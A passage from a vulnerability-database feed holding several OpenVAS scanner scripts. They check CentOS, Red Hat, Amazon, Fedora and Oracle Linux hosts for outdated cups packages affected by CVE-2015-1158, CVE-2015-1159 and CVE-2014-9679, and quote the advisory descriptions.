2015)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for cups CESA-2015:1123 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of cups\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"CUPS provides a portable printing layer for\n Linux, UNIX, and similar operating systems.\n\nA string reference count bug was found in cupsd, causing premature freeing\nof string objects. An attacker can submit a malicious print job that\nexploits this flaw to dismantle ACLs protecting privileged operations,\nallowing a replacement configuration file to be uploaded which in turn\nallows the attacker to run arbitrary code in the CUPS server\n(CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. An\nattacker could use this flaw to bypass the default configuration settings\nthat bind the CUPS scheduler to the 'localhost' or loopback interface.\n(CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in\nthe way cups handled compressed raster image files. An attacker could\ncreate a specially-crafted image file, which when passed via the cups\nRaster filter, could cause the cups filter to crash. (CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158 and\nCVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the cupsd daemon will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"cups on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:1123\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-June/021178.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.6.3~17.el7_1.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.6.3~17.el7_1.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.6.3~17.el7_1.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-filesystem\", rpm:\"cups-filesystem~1.6.3~17.el7_1.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-ipptool\", rpm:\"cups-ipptool~1.6.3~17.el7_1.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.6.3~17.el7_1.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.6.3~17.el7_1.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T22:59:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120032", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120032", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2015-559)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120032\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:15:44 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2015-559)\");\n script_tag(name:\"insight\", value:\"A string reference count bug was found in cupsd, causing premature freeing of string objects. An attacker can submit a malicious print job that exploits this flaw to dismantle ACLs protecting privileged operations, allowing a replacement configuration file to be uploaded which in turn allows the attacker to run arbitrary code in the CUPS server (CVE-2015-1158 )A cross-site scripting flaw was found in the cups web templating engine. An attacker could use this flaw to bypass the default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface. (CVE-2015-1159 )An integer overflow leading to a heap-based buffer overflow was found in the way cups handled compressed raster image files. An attacker could create a specially-crafted image file, which when passed via the cups Raster filter, could cause the cups filter to crash. (CVE-2014-9679 )\");\n script_tag(name:\"solution\", value:\"Run yum update cups to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-559.html\");\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\", \"CVE-2014-9679\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"cups-debuginfo\", rpm:\"cups-debuginfo~1.4.2~67.21.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.4.2~67.21.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cups-php\", rpm:\"cups-php~1.4.2~67.21.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.4.2~67.21.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.4.2~67.21.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.4.2~67.21.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2015-06-18T00:00:00", "id": "OPENVAS:1361412562310871377", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871377", "type": "openvas", "title": "RedHat Update for cups RHSA-2015:1123-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for cups RHSA-2015:1123-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871377\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-18 06:12:04 +0200 (Thu, 18 Jun 2015)\");\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for cups RHSA-2015:1123-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'cups'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"CUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature freeing\nof string objects. An attacker can submit a malicious print job that\nexploits this flaw to dismantle ACLs protecting privileged operations,\nallowing a replacement configuration file to be uploaded which in turn\nallows the attacker to run arbitrary code in the CUPS server\n(CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. An\nattacker could use this flaw to bypass the default configuration settings\nthat bind the CUPS scheduler to the 'localhost' or loopback interface.\n(CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in\nthe way cups handled compressed raster image files. An attacker could\ncreate a specially-crafted image file, which when passed via the cups\nRaster filter, could cause the cups filter to crash. (CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158 and\nCVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the cupsd daemon will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"cups on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:1123-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-June/msg00021.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups-filesystem\", rpm:\"cups-filesystem~1.6.3~17.el7_1.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.6.3~17.el7_1.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.6.3~17.el7_1.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-debuginfo\", rpm:\"cups-debuginfo~1.6.3~17.el7_1.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.6.3~17.el7_1.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.6.3~17.el7_1.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.6.3~17.el7_1.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.4.2~67.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-debuginfo\", rpm:\"cups-debuginfo~1.4.2~67.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.4.2~67.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.4.2~67.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.4.2~67.el6_6.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-06-21T00:00:00", "id": "OPENVAS:1361412562310869456", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869456", "type": "openvas", "title": "Fedora Update for cups FEDORA-2015-9801", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for cups FEDORA-2015-9801\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869456\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-21 05:54:54 +0200 (Sun, 21 Jun 2015)\");\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\", \"CVE-2014-9679\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for cups FEDORA-2015-9801\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'cups'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"cups on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-9801\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-June/160577.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.7.5~17.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "description": "Oracle Linux Local Security Checks ELSA-2015-1123", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123098", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123098", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-1123", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1123.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123098\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 13:59:21 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1123\");\n script_tag(name:\"insight\", value:\"ELSA-2015-1123 - cups security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1123\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1123.html\");\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(7|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.6.3~17.el7_1.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.6.3~17.el7_1.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.6.3~17.el7_1.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-filesystem\", rpm:\"cups-filesystem~1.6.3~17.el7_1.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-ipptool\", rpm:\"cups-ipptool~1.6.3~17.el7_1.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.6.3~17.el7_1.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.6.3~17.el7_1.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.4.2~67.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.4.2~67.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.4.2~67.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.4.2~67.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-php\", rpm:\"cups-php~1.4.2~67.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "description": "Check the version of cups", "modified": "2019-03-08T00:00:00", "published": "2015-06-19T00:00:00", "id": "OPENVAS:1361412562310882202", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882202", "type": "openvas", "title": "CentOS Update for cups CESA-2015:1123 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for cups CESA-2015:1123 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882202\");\n script_version(\"$Revision: 14058 $\");\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-19 06:18:37 +0200 (Fri, 19 Jun 2015)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for cups CESA-2015:1123 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of cups\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"CUPS provides a portable printing layer\n for Linux, UNIX, and similar operating systems.\n\nA string reference count bug was found in cupsd, causing premature freeing\nof string objects. An attacker can submit a malicious print job that\nexploits this flaw to dismantle ACLs protecting privileged operations,\nallowing a replacement configuration file to be uploaded which in turn\nallows the attacker to run arbitrary code in the CUPS server\n(CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. An\nattacker could use this flaw to bypass the default configuration settings\nthat bind the CUPS scheduler to the 'localhost' or loopback interface.\n(CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in\nthe way cups handled compressed raster image files. An attacker could\ncreate a specially-crafted image file, which when passed via the cups\nRaster filter, could cause the cups filter to crash. (CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158 and\nCVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the cupsd daemon will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"cups on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:1123\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-June/021179.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.4.2~67.el6_6.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.4.2~67.el6_6.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.4.2~67.el6_6.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.4.2~67.el6_6.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-php\", rpm:\"cups-php~1.4.2~67.el6_6.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-07-07T00:00:00", "id": "OPENVAS:1361412562310869513", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869513", "type": "openvas", "title": "Fedora Update for cups FEDORA-2015-9726", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for cups FEDORA-2015-9726\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be 